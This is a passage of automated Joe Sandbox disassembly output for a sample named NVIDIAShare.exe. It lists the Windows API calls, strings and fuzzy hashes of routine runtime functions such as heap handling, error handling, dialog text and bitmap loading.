                                                              • Part of subcall function 0101A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0101A762
                                                              • Part of subcall function 0101A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
                                                              • Part of subcall function 0101A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6
                                                              • Part of subcall function 0101A6C2: GlobalFree.KERNEL32(00000000), ref: 0101A7CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                            • String ID: ]
                                                            • API String ID: 1797374341-3352871620
                                                            • Opcode ID: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
                                                            • Instruction ID: 16b712900256b6ea0c26d4577ff3b0f1e10799bc8fd98efc3037b37251e17052
                                                            • Opcode Fuzzy Hash: ae5ecf9b75a10d4d7da9c217500736ffdf6033197dcdf0fb0c075fbf8ff90d59
                                                            • Instruction Fuzzy Hash: 9901D636641202A7E72277785D08ABF7AF9BF80662F080050F9C4A729CDF7E8C0946A0
                                                            APIs
                                                              • Part of subcall function 01001316: GetDlgItem.USER32(00000000,00003021), ref: 0100135A
                                                              • Part of subcall function 01001316: SetWindowTextW.USER32(00000000,010335F4), ref: 01001370
                                                            • EndDialog.USER32(?,00000001), ref: 0101D64B
                                                            • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0101D661
                                                            • SetDlgItemTextW.USER32(?,00000066,?), ref: 0101D675
                                                            • SetDlgItemTextW.USER32(?,00000068), ref: 0101D684
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ItemText$DialogWindow
                                                            • String ID: RENAMEDLG
                                                            • API String ID: 445417207-3299779563
                                                            • Opcode ID: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
                                                            • Instruction ID: 3da7e24464a8ba92c67c79d341b1c875edef76f88cc7230921703cb23582bbf6
                                                            • Opcode Fuzzy Hash: 161be61dd898c24d4190d888df394bb54aa98793f0892a02384ae133e55ce86c
                                                            • Instruction Fuzzy Hash: AD01F933244310BAE3214FA85E0DF5B7B9CBB5E701F010810F3C5A509DC7AF95048765
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,01027E24,00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002), ref: 01027E93
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01027EA6
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,01027E24,00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002), ref: 01027EC9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: bdce330b80cc37e42e94380c6ad34d1fb2746e514979a0ce2100e0e9e08e0cd5
                                                            • Instruction ID: 9d8f774f1337a7ca9331fd5aafe7b40034a9611998c0449c968f6364b85c0149
                                                            • Opcode Fuzzy Hash: bdce330b80cc37e42e94380c6ad34d1fb2746e514979a0ce2100e0e9e08e0cd5
                                                            • Instruction Fuzzy Hash: 5CF06831900218BBDF219FA5DC49B9EBFBDFF44715F0041A9F845A6254DB3A9E44CBA0
                                                            APIs
                                                              • Part of subcall function 0101081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 01010836
                                                              • Part of subcall function 0101081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0100F2D8,Crypt32.dll,00000000,0100F35C,?,?,0100F33E,?,?,?), ref: 01010858
                                                            • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0100F2E4
                                                            • GetProcAddress.KERNEL32(010481C8,CryptUnprotectMemory), ref: 0100F2F4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$DirectoryLibraryLoadSystem
                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                                                            • API String ID: 2141747552-1753850145
                                                            • Opcode ID: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
                                                            • Instruction ID: 4dc47194e12eb4000521233aebb11717160d793e7e853d70aeab022ca3f212dc
                                                            • Opcode Fuzzy Hash: d2af7a02f29de3c501a169e9c0e257e1cb74f16cd946a1c11bdb634f8cfd66fe
                                                            • Instruction Fuzzy Hash: 09E04F70D10B029ED7319B799588B41BAD87F44610F14885DF0DADB645DBB9D0818B50
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer$_abort
                                                            • String ID:
                                                            • API String ID: 2252061734-0
                                                            • Opcode ID: ef8d6e5f8792956ed721b2ade7b1d68ecd13fa61206d3958992df28c7f00af28
                                                            • Instruction ID: d77efd25ce6cdc8946388eb885a86333e916e2e7f5dd8850480e39ebe6793ff3
                                                            • Opcode Fuzzy Hash: ef8d6e5f8792956ed721b2ade7b1d68ecd13fa61206d3958992df28c7f00af28
                                                            • Instruction Fuzzy Hash: DF510671600326AFEB29AFD8D840BBAB7E4FF54310F24416DED85476A1D772E950CB90
                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 0102BF39
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0102BF5C
                                                              • Part of subcall function 01028E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0102CA2C,00000000,?,01026CBE,?,00000008,?,010291E0,?,?,?), ref: 01028E38
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0102BF82
                                                            • _free.LIBCMT ref: 0102BF95
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0102BFA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
                                                            • Instruction ID: 16c463447fe1139e3b3a2d5e9b34ac76e51a92e10dc0e862056522a5c2d1192e
                                                            • Opcode Fuzzy Hash: 5fa63b5fd0b03ffceafaec370d5b210590d901ffac9b67981e17d3dd9a6d25c8
                                                            • Instruction Fuzzy Hash: 0D01D476601A317F3761157A5C8CDBB7FBDEEC2AA03140169FA84C6104EA668C0186B0
                                                            APIs
                                                            • GetLastError.KERNEL32(?,01041030,00000200,010291AD,0102617E,?,?,?,?,0100D984,?,?,?,00000004,0100D710,?), ref: 0102986E
                                                            • _free.LIBCMT ref: 010298A3
                                                            • _free.LIBCMT ref: 010298CA
                                                            • SetLastError.KERNEL32(00000000,01033A34,00000050,01041030), ref: 010298D7
                                                            • SetLastError.KERNEL32(00000000,01033A34,00000050,01041030), ref: 010298E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: e325d32940bd83ef50ce1536558b52985778350a46daa70b2af86d64d333abcd
                                                            • Instruction ID: 94d8680c7ce6faa034e6ead7d51b6d70e6d318dffdf4a77fe5ba452f01adc7ac
                                                            • Opcode Fuzzy Hash: e325d32940bd83ef50ce1536558b52985778350a46daa70b2af86d64d333abcd
                                                            • Instruction Fuzzy Hash: 67012D36244632EBD3333238ACC4A5F26ADFFD167CF280136F5C596181EEB588064230
                                                            APIs
                                                              • Part of subcall function 010111CF: ResetEvent.KERNEL32(?), ref: 010111E1
                                                              • Part of subcall function 010111CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 010111F5
                                                            • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 01010F21
                                                            • CloseHandle.KERNEL32(?,?), ref: 01010F3B
                                                            • DeleteCriticalSection.KERNEL32(?), ref: 01010F54
                                                            • CloseHandle.KERNEL32(?), ref: 01010F60
                                                            • CloseHandle.KERNEL32(?), ref: 01010F6C
                                                              • Part of subcall function 01010FE4: WaitForSingleObject.KERNEL32(?,000000FF,01011206,?), ref: 01010FEA
                                                              • Part of subcall function 01010FE4: GetLastError.KERNEL32(?), ref: 01010FF6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                            • String ID:
                                                            • API String ID: 1868215902-0
                                                            • Opcode ID: 1c885d480c9c6eb4fcda13a2ba25f042eb0067a70e54a506de004dde64853db1
                                                            • Instruction ID: cd916ecec26834747e6e91f96997fdd2ab17f6b7fc3b79949b52777181375708
                                                            • Opcode Fuzzy Hash: 1c885d480c9c6eb4fcda13a2ba25f042eb0067a70e54a506de004dde64853db1
                                                            • Instruction Fuzzy Hash: D5014C76500B44EBC7229B65D8C5BC6FBADFB08711F00092DF2EA96558CB7A6984CB90
                                                            APIs
                                                            • _free.LIBCMT ref: 0102C817
                                                              • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                              • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                            • _free.LIBCMT ref: 0102C829
                                                            • _free.LIBCMT ref: 0102C83B
                                                            • _free.LIBCMT ref: 0102C84D
                                                            • _free.LIBCMT ref: 0102C85F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
                                                            • Instruction ID: c8333c06bd12d0ad7bae8cbed2d8f9fa469a73dc77f445144ff55acd70a39c69
                                                            • Opcode Fuzzy Hash: 9532f4d4a3fd4affec68d1d70fae4b6a6d33c1f341a884398edff04d5a0c2f93
                                                            • Instruction Fuzzy Hash: 7DF06232500221ABF670EA6CE584C5B77EDAA107207648C5BF2C8D7515CBB5F880CB60
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 01011FE5
                                                            • _wcslen.LIBCMT ref: 01011FF6
                                                            • _wcslen.LIBCMT ref: 01012006
                                                            • _wcslen.LIBCMT ref: 01012014
                                                            • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0100B371,?,?,00000000,?,?,?), ref: 0101202F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$CompareString
                                                            • String ID:
                                                            • API String ID: 3397213944-0
                                                            • Opcode ID: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
                                                            • Instruction ID: dedb9b0371da9c1cdf57d482c1c875e6784c658ef16abffee9ac1bdc85751d4a
                                                            • Opcode Fuzzy Hash: 20983f28d8e15bd1cbf9ca4333589933f75c208e4875693d2af2679952bc31cb
                                                            • Instruction Fuzzy Hash: 52F01D32008125BBCF226F51EC08DCE7F26EB44760B218415F69A5E0A1CB76D965D690
                                                            APIs
                                                            • _free.LIBCMT ref: 0102891E
                                                              • Part of subcall function 01028DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34), ref: 01028DE2
                                                              • Part of subcall function 01028DCC: GetLastError.KERNEL32(01033A34,?,0102C896,01033A34,00000000,01033A34,00000000,?,0102C8BD,01033A34,00000007,01033A34,?,0102CCBA,01033A34,01033A34), ref: 01028DF4
                                                            • _free.LIBCMT ref: 01028930
                                                            • _free.LIBCMT ref: 01028943
                                                            • _free.LIBCMT ref: 01028954
                                                            • _free.LIBCMT ref: 01028965
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
                                                            • Instruction ID: 7ff9524b0f86b1994407ebefd027f95ceb16a152c988fe3a02356dbfe374467e
                                                            • Opcode Fuzzy Hash: 638b2eb3bf9cc3d55d7349f90709da70725f134a2aaa68e9df8c33ecebc40b6e
                                                            • Instruction Fuzzy Hash: 3AF03479911233ABA666BF28F8004493FE9FB287203044A07F5D89227DC77F4959DB91
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _swprintf
                                                            • String ID: %ls$%s: %s
                                                            • API String ID: 589789837-2259941744
                                                            • Opcode ID: fe065ab3a9cc5eff1da0322037684990a1a80f09f798f740996de3738fee35c5
                                                            • Instruction ID: d31775acd51c765dfa0a4ea334c43984f661dd46a68a754d96ee2ed87854c4e7
                                                            • Opcode Fuzzy Hash: fe065ab3a9cc5eff1da0322037684990a1a80f09f798f740996de3738fee35c5
                                                            • Instruction Fuzzy Hash: D251D535288301F6F62A1AB48D45F7D7676BB19B08F048D46F7C6784E8D9BFA410871A
                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe,00000104), ref: 01027FAE
                                                            • _free.LIBCMT ref: 01028079
                                                            • _free.LIBCMT ref: 01028083
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Users\user\Desktop\NVIDIAShare.exe.bin.exe
                                                            • API String ID: 2506810119-3482315862
                                                            • Opcode ID: f98c2519891f6ffa1db06158ead117b78a189c56f67a1307969db595f9bacc7e
                                                            • Instruction ID: cf22fffd97cf6ec76734889ef236c0dfa12372b9c171a01b559e565830542d4a
                                                            • Opcode Fuzzy Hash: f98c2519891f6ffa1db06158ead117b78a189c56f67a1307969db595f9bacc7e
                                                            • Instruction Fuzzy Hash: 3C31A275A04229EFDB61DF99D880D9EBBFCEF99310F1080ABF98497210D6759A40CB51
                                                            APIs
                                                            • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 010231FB
                                                            • _abort.LIBCMT ref: 01023306
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true
                                                            • Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer_abort
                                                            • String ID: MOC$RCC
                                                            • API String ID: 948111806-2084237596
                                                            • Opcode ID: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
                                                            • Instruction ID: c858d9e6591e3be99bb352e16ecf85288f4dd1bef9b27f5543531d9304656829
                                                            • Opcode Fuzzy Hash: 9991bcedfb5ba944ca20776345c51734571332bf0aff8fd387d73a6e3577be4e
                                                            • Instruction Fuzzy Hash: A7418D71900229AFDF16DF98CC81AEEBBB5FF09304F188099FA446B211D339E950DB50
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 01007406
                                                              • Part of subcall function 01003BBA: __EH_prolog.LIBCMT ref: 01003BBF
                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 010074CD
                                                              • Part of subcall function 01007A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 01007AAB
